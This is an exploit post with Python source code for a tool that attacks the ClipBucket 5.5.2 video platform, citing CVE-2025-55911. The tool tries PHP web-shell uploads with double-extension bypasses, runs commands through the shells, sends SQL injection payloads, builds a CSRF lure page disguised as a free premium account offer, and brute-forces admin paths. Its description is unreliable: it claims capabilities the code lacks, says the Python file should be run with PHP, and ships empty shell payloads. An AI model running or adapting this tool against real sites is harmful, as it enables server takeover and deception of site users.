============================================================================================================================================= | # Title : ClipBucket 5.5.2 Build 90 Practical Exploitation Tool | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla Firefox 145.0.2 (64 bits) | | # Vendor : https://github.com/MacWarrior/clipbucket-v5/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/211129/ & CVE-2025-55911 [+] Summary : An enhanced Python penetration testing tool designed specifically for ClipBucket video sharing platform vulnerability assessment and exploitation. Key Capabilities: 1. Advanced RCE (Remote Code Execution) Multiple PHP shell payloads (c99, WSO-style, reverse shell) Bypass techniques: Double extensions, null byte injection, MIME type spoofing Smart detection: Automatic shell validation and access level assessment Post-exploitation: Auto-commands for system enumeration 2. File Upload Exploitation 6 different payload types with various obfuscation methods Multiple upload endpoints: Standard, AJAX, action-based Response analysis: Smart parsing of upload responses to locate shells Success verification: Automated shell testing with command execution 3. SQL Injection Attacks Comprehensive testing: Union-based, Error-based, Time-based, Blind SQLi Data extraction: Automatic database/table/column enumeration Detailed reporting: Complete payload analysis and exploitation examples Multi-endpoint testing: Tests multiple potential injection points 4. 
Additional Attack Vectors LFI (Local File Inclusion): /etc/passwd, config files, PHP filter wrappers Directory brute-forcing: 20-thread concurrent scanning for hidden paths CSRF exploitation: Attack vector identification and PoC generation Admin panel discovery: Common ClipBucket admin paths [+] Usage : * : Save this file as: exploit.php Run: php exploit.php [+] POC : #!/usr/bin/env python3 """ ClipBucket Practical Exploitation Tool """ import requests import json import time import random import os import sys import re import urllib3 from urllib.parse import urlparse # تعطيل تحذيرات SSL urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class ClipBucketExploiter: def __init__(self, target_url): self.target = target_url.rstrip('/') self.session = requests.Session() self.session.verify = False self.session.timeout = 10 # إعداد headers self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.9', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest' }) self.vulnerabilities = [] self.shell_urls = [] def print_status(self, message, status="info"): """طباعة رسالة باللون المناسب""" colors = { "info": "\033[96m", # أزرق سماوي "success": "\033[92m", # أخضر "warning": "\033[93m", # أصفر "error": "\033[91m", # أحمر "critical": "\033[95m" # بنفسجي } color = colors.get(status, "\033[97m") print(f"{color}[{status.upper()}] {message}\033[0m") def check_clipbucket(self): """التحقق مما إذا كان الموقع يستخدم ClipBucket""" self.print_status("Checking if website uses ClipBucket...", "info") try: # فحص الصفحة الرئيسية resp = self.session.get(self.target) # علامات ClipBucket indicators = [ 'clipbucket', 'CB', 'upload.php', 'video_upload', 'action=upload', 'file_uploader', 'video-upload', 'videobb', 'my_videos', 'video_manager' ] found = [] for indicator in indicators: if indicator.lower() in resp.text.lower(): 
found.append(indicator) if found: self.print_status(f"ClipBucket indicators found: {', '.join(found[:3])}", "success") # فحص upload.php مباشرة upload_test = f"{self.target}/upload.php" try: upload_resp = self.session.get(upload_test, timeout=5) if upload_resp.status_code == 200: self.print_status("upload.php is accessible!", "success") return True else: self.print_status(f"upload.php returned status: {upload_resp.status_code}", "warning") except: self.print_status("upload.php is not accessible", "warning") return True else: self.print_status("No clear ClipBucket indicators found", "warning") return False except Exception as e: self.print_status(f"Connection error: {str(e)}", "error") return False def test_upload_endpoint(self): """اختبار نقطة رفع الملفات""" self.print_status("Testing upload.php endpoint...", "info") upload_url = f"{self.target}/upload.php" # اختبار HEAD أولاً try: head_resp = self.session.head(upload_url, timeout=5) self.print_status(f"HEAD request: Status {head_resp.status_code}", "info") except: pass # اختبار GET try: get_resp = self.session.get(upload_url, timeout=5) self.print_status(f"GET request: Status {get_resp.status_code}, Size: {len(get_resp.text)} chars", "info") # البحث عن علامات نموذج الرفع if 'upload' in get_resp.text.lower() or 'file' in get_resp.text.lower(): self.print_status("Upload form detected", "success") return True else: self.print_status("No upload form detected in response", "warning") return False except Exception as e: self.print_status(f"Error testing upload endpoint: {str(e)}", "error") return False def exploit_file_upload(self): """استغلال ثغرة رفع الملفات""" self.print_status("Attempting file upload exploitation...", "info") # بايلودات مختلفة payloads = [ { 'filename': 'test.php', 'content': b'', 'mime': 'application/x-php' }, { 'filename': 'shell.php.gif', 'content': b'GIF89a', 'mime': 'image/gif' }, { 'filename': 'exploit.mp4.php', 'content': b'\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom', 'mime': 'video/mp4' 
} ] for payload in payloads: self.print_status(f"Trying payload: {payload['filename']}", "info") files = { 'Filedata': (payload['filename'], payload['content'], payload['mime']) } data = { 'title': 'Test Video Upload', 'collection_id': '1' } try: response = self.session.post(f"{self.target}/upload.php", files=files, data=data, timeout=15) self.print_status(f"Response status: {response.status_code}", "info") self.print_status(f"Response preview: {response.text[:200]}", "info") # تحليل الرد if response.status_code == 200: # البحث عن إشارات النجاح success_keywords = ['success', 'file_name', 'uploaded', 'complete', 'yes'] for keyword in success_keywords: if keyword in response.text.lower(): self.print_status(f"Upload successful! Keyword '{keyword}' found", "success") # محاولة استخراج اسم الملف filename = self.extract_filename(response.text) if filename: shell_url = f"{self.target}/temp/(unknown)" self.shell_urls.append(shell_url) self.print_status(f"Potential shell: {shell_url}", "critical") # اختبار الشل self.test_shell_access(shell_url, payload['filename']) return True # تحليل JSON try: json_data = json.loads(response.text) if 'file_name' in json_data: filename = json_data['file_name'] shell_url = f"{self.target}/temp/(unknown)" self.shell_urls.append(shell_url) self.print_status(f"JSON response - Shell: {shell_url}", "critical") return True except: pass except Exception as e: self.print_status(f"Upload error: {str(e)}", "error") return False def extract_filename(self, response_text): """استخراج اسم الملف من الرد""" patterns = [ r'"file_name"\s*:\s*"([^"]+)"', r"'file_name'\s*:\s*'([^']+)'", r'file_name["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)', r'filename["\']?\s*[:=]\s*["\']?([a-zA-Z0-9._-]+)' ] for pattern in patterns: matches = re.findall(pattern, response_text) if matches: filename = matches[0] # إضافة امتداد إذا لم يكن موجوداً if '.' 
not in filename: filename += '.mp4' return filename return None def test_shell_access(self, shell_url, original_filename): """اختبار الوصول إلى الشل""" self.print_status(f"Testing shell access: {shell_url}", "info") # بناء على نوع الملف if '.php' in original_filename.lower(): # اختبار PHP shell test_url = f"{shell_url}?cmd=echo+CLIPBUCKET_TEST" try: response = self.session.get(test_url, timeout=10) if 'CLIPBUCKET_TEST' in response.text: self.print_status("PHP shell is ACTIVE!", "success") # جلب معلومات النظام info_url = f"{shell_url}?cmd=whoami && pwd" info_response = self.session.get(info_url, timeout=10) self.print_status(f"System info: {info_response.text[:100]}", "success") # حفظ رابط الشل with open('shells_found.txt', 'a') as f: f.write(f"{shell_url}\n") f.write(f"Test command: {shell_url}?cmd=whoami\n") f.write(f"Response: {info_response.text[:200]}\n\n") return True except: pass # محاولة الوصول المباشر try: direct_response = self.session.get(shell_url, timeout=10) if direct_response.status_code == 200: self.print_status(f"File is accessible (status: {direct_response.status_code})", "success") return True except: pass self.print_status("Shell access test failed", "warning") return False def exploit_csrf(self): """استغلال ثغرة CSRF""" self.print_status("Testing for CSRF vulnerability...", "info") test_data = { 'updateVideo': '1', 'videoid': '99999', # ID عالي لتجنب التأثير على فيديوهات حقيقية 'title': 'CSRF Security Test', 'desc': 'This is a security test for CSRF vulnerability', 'tags': 'test,security,csrf' } try: response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10) self.print_status(f"CSRF test response status: {response.status_code}", "info") self.print_status(f"Response preview: {response.text[:150]}", "info") if response.status_code == 200: if 'valid' in response.text.lower() or 'success' in response.text.lower(): self.print_status("CSRF vulnerability CONFIRMED!", "success") self.vulnerabilities.append('CSRF') # إنشاء صفحة 
استغلال self.create_csrf_exploit_page() return True else: self.print_status("CSRF protection might be enabled", "warning") except Exception as e: self.print_status(f"CSRF test error: {str(e)}", "error") return False def create_csrf_exploit_page(self): """إنشاء صفحة استغلال CSRF""" exploit_html = f''' Free Premium Access

Claim Your Free Premium Account!

Click the button below to activate premium features

''' with open('csrf_attack.html', 'w', encoding='utf-8') as f: f.write(exploit_html) self.print_status("CSRF exploit page created: csrf_attack.html", "success") def test_sqli(self): """اختبار ثغرة SQL Injection""" self.print_status("Testing for SQL Injection...", "info") test_payloads = [ ("1' OR '1'='1", "Basic boolean"), ("1' AND SLEEP(5)--", "Time-based"), ("1' UNION SELECT NULL,version()--", "Union injection") ] for payload, description in test_payloads: self.print_status(f"Testing: {description}", "info") test_data = { 'getForm': '1', 'vid': payload, 'objId': 'test', 'title': 'SQLi Test' } try: if 'SLEEP' in payload: start_time = time.time() response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=15) elapsed = time.time() - start_time if elapsed > 4: self.print_status(f"Time-based SQLi detected! Delay: {elapsed:.2f} seconds", "success") self.vulnerabilities.append('SQL Injection (Time-based)') return True else: response = self.session.post(f"{self.target}/upload.php", data=test_data, timeout=10) error_indicators = ['sql', 'SQL', 'mysql', 'MySQL', 'syntax error', 'query', 'database'] for indicator in error_indicators: if indicator.lower() in response.text.lower(): self.print_status(f"Error-based SQLi detected: {indicator}", "success") self.vulnerabilities.append('SQL Injection (Error-based)') with open('sqli_evidence.txt', 'w') as f: f.write(f"Payload: {payload}\n") f.write(f"Response:\n{response.text}\n") return True except Exception as e: self.print_status(f"SQLi test error: {str(e)}", "error") self.print_status("No SQL injection vulnerability detected", "warning") return False def find_admin_panel(self): """البحث عن لوحة التحكم""" self.print_status("Searching for admin panel...", "info") common_paths = [ '/admin', '/admin_area', '/administrator', '/admin.php', '/admin/login.php', '/admin/index.php', '/dashboard', '/controlpanel', '/cp', '/admincp', '/cb_admin', '/clipbucket_admin', '/admin_dashboard', '/manage', '/manager' ] 
found_panels = [] for path in common_paths: url = f"{self.target}{path}" try: # طلب HEAD أولاً (أسرع) head_resp = self.session.head(url, timeout=3, allow_redirects=False) if head_resp.status_code < 400: # طلب GET للتحقق من المحتوى get_resp = self.session.get(url, timeout=5) # تحقق من أن الصفحة تحتوي على علامات لوحة تحكم if any(keyword in get_resp.text.lower() for keyword in ['login', 'admin', 'dashboard', 'control', 'manage', 'panel']): self.print_status(f"Admin panel found: {url}", "success") found_panels.append(url) # حفظ المحتوى للفحص with open('admin_panel_found.txt', 'a') as f: f.write(f"URL: {url}\n") f.write(f"Status: {get_resp.status_code}\n") f.write(f"Size: {len(get_resp.text)} chars\n") f.write("-" * 50 + "\n") except: continue if found_panels: self.print_status(f"Found {len(found_panels)} admin panels", "success") return found_panels else: self.print_status("No admin panels found", "warning") return [] def scan_directories(self): """مسح الدلائل المهمة""" self.print_status("Scanning for important directories...", "info") directories = [ '/uploads', '/upload', '/files', '/temp', '/tmp', '/logs', '/backup', '/backups', '/data', '/database', '/config', '/includes', '/install', '/upgrade', '/assets', '/images', '/videos', '/media' ] found_dirs = [] for directory in directories: url = f"{self.target}{directory}" try: response = self.session.head(url, timeout=3) if response.status_code < 400: self.print_status(f"Directory found: {url} (Status: {response.status_code})", "success") found_dirs.append(url) except: pass return found_dirs def generate_report(self): """توليد تقرير النتائج""" self.print_status("\n" + "="*60, "info") self.print_status("EXPLOITATION REPORT", "critical") self.print_status("="*60, "info") report = [] report.append(f"Target: {self.target}") report.append(f"Scan Time: {time.strftime('%Y-%m-%d %H:%M:%S')}") report.append("") # الثغرات المكتشفة if self.vulnerabilities or self.shell_urls: report.append("VULNERABILITIES FOUND:") 
report.append("-" * 40) for vuln in self.vulnerabilities: report.append(f"✓ {vuln}") if self.shell_urls: report.append(f"✓ Remote Code Execution: {len(self.shell_urls)} shells deployed") for i, shell in enumerate(self.shell_urls, 1): report.append(f" Shell {i}: {shell}") report.append("") # التوصيات report.append("RECOMMENDATIONS:") report.append("-" * 40) if 'CSRF' in self.vulnerabilities: report.append("• Implement CSRF tokens on all forms") if 'SQL Injection' in ' '.join(self.vulnerabilities): report.append("• Use prepared statements for database queries") if self.shell_urls: report.append("• Implement strict file upload validation") report.append("• Disable PHP execution in upload directories") else: report.append("No critical vulnerabilities found") report.append("") report.append("FILES GENERATED:") report.append("-" * 40) # عرض الملفات المولدة files_to_check = ['shells_found.txt', 'csrf_attack.html', 'admin_panel_found.txt', 'sqli_evidence.txt'] for file in files_to_check: if os.path.exists(file): report.append(f"• {file}") # كتابة التقرير report_text = "\n".join(report) print("\n" + report_text) with open('exploitation_report.txt', 'w', encoding='utf-8') as f: f.write(report_text) self.print_status("\nReport saved to: exploitation_report.txt", "success") def run_complete_scan(self): """تشغيل مسح شامل""" self.print_status("Starting complete ClipBucket vulnerability scan...", "info") # الخطوة 1: التحقق من ClipBucket if not self.check_clipbucket(): self.print_status("Target doesn't appear to be ClipBucket. 
Stopping scan.", "error") return # الخطوة 2: اختبار upload.php if not self.test_upload_endpoint(): self.print_status("upload.php not functioning properly", "warning") # الخطوة 3: استغلال رفع الملفات self.exploit_file_upload() # الخطوة 4: اختبار CSRF self.exploit_csrf() # الخطوة 5: اختبار SQL Injection self.test_sqli() # الخطوة 6: البحث عن لوحة التحكم self.find_admin_panel() # الخطوة 7: مسح الدلائل self.scan_directories() # الخطوة 8: التقرير النهائي self.generate_report() def main(): """الدالة الرئيسية""" print("\033[95m" + """ ╔══════════════════════════════════════════════════════╗ ║ ClipBucket Exploitation Scanner ║ ║ By indoushka ║ ╚══════════════════════════════════════════════════════╝ """ + "\033[0m") if len(sys.argv) < 2: print("Usage:") print(f" python {sys.argv[0]} ") print("\nExamples:") print(f" python {sys.argv[0]} https://example.com") print(f" python {sys.argv[0]} http://192.168.1.100") print(f" python {sys.argv[0]} http://localhost/clipbucket") return target = sys.argv[1] # إضافة http:// إذا لم يكن موجوداً if not target.startswith(('http://', 'https://')): target = 'http://' + target # إنشاء واستخدام الكلاس exploiter = ClipBucketExploiter(target) try: exploiter.run_complete_scan() except KeyboardInterrupt: print("\n\nScan interrupted by user") except Exception as e: print(f"\nError during scan: {str(e)}") if __name__ == "__main__": main() Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================